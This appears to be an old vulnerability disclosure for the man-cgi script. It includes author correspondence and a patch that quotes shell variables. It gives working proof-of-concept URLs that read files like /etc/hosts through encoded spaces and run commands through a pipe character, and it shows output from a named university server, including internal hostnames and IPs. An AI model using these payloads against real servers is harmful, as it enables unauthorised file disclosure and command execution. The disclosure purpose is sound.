man-cgi.txt

`Upon researching several possible cgi based man holes I ran across the  
following bugged code  
  
© 1994-1999 Man-cgi 2.00, Panagiotis Christias  
<[email protected]>  
  
© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,  
<[email protected]>  
  
© 1994 Man-cgi 1.15, Panagiotis Christias  
<[email protected]>  
  
© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana  
<[email protected]>  
  
  
the issue is with the filtering of %20 or any other hex encoded url in  
adittion to a known file name will allow you  
to view the file with permissions of the web server ... in some  
implementations it is also possible to specify the  
path to a known executable and thus you are able to run the executable for  
example /usr/bin/id. These issues  
may be used to disclose sensitive information on your servr or possible  
allow someone to run any command they want on  
it ... if you have further questions mail me.  
  
----------------------------------------------------------  
  
http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20  
reveals the following  
  
#  
# Internet host table  
#  
127.0.0.1 localhost  
#147.102.222.210 achilles.noc.ntua.gr achilles  
147.102.222.210 achilles.noc.ntua.gr achilles  
147.102.222.211 patroklos.noc.ntua.gr patroklos  
147.102.222.230 ulysses.noc.ntua.gr ulysses  
# Required for backup  
147.102.222.250 menelaos.noc.ntua.gr menelaos  
  
-----------------------------------------------------------  
  
http://xxx/cgi-bin/man-cgi?/usr/bin/id  
or  
http://xxx/cgi-bin/man-cgi?|/usr/bin/id  
uid=99(nobody) gid=99(nobody) groups=99(nobody)  
  
-----------------------------------------------------------  
  
below are the Authors Patches and comments from one of the people who has  
modified the script  
to operate on other os's  
  
Sorry for my delayed reply, too much work to do and too much email  
to read and reply. Here is a quick fix:  
  
***************  
*** 185,191 ****  
{ print "<HR align=left width=640 size=2 noshade>"; \  
printf("<B>NOTE:</b> man page for %s may be in the wrong place.  
\n",PAGE); \  
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional  
pages</a>\n",URL,PAGE); } }' \  
! PAGE=$COMMAND URL=$MANCGI  
  
fi;  
  
---- 178,184 ----  
{ print "<HR align=left width=640 size=2 noshade>"; \  
printf("<B>NOTE:</b> man page for %s may be in the wrong place.  
\n",PAGE); \  
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional  
pages</a>\n",URL,PAGE); } }' \  
! PAGE="$COMMAND" URL="$MANCGI"  
  
fi;  
  
The values of the PAGE and URL variables should be quoted. This is the  
first  
step. I should correct several other parts of the script. I was quite  
naive  
when I wrote man-cgi several years ago :)  
  
You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi  
  
Regards,  
Panagiotis  
--  
Panagiotis J. Christias Network Management Center  
[email protected] National Technical Univ. of Athens, GREECE  
  
----------------------------------------------------------------  
  
On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:  
Sorry to be so dim, but I really could not fathom the point you were  
trying  
to make with your first email. Only now do I understand the significance  
of puting in the %20 (space  
character). I still don't understand your anonymity, but I guess I can  
live with it.  
The man-cgi script was written by Panagiotis Christias, and I made some  
enhancements and got it working for Solaris. It works so well that noone  
(AFAIK) has bothered to re-write it for Perl.  
  
I am grateful that you have pointed out this security loop hole to us.  
It is up to you whether you report it through the normal channels or not.  
As it can be used to read the /etc/passwd file it could be a real  
security  
threat. I will look at the script and see if I can find a solution, I  
hope  
Panagiotis will do the same.  
  
--  
David Adams  
Computing Services  
Southampton University  
  
  
`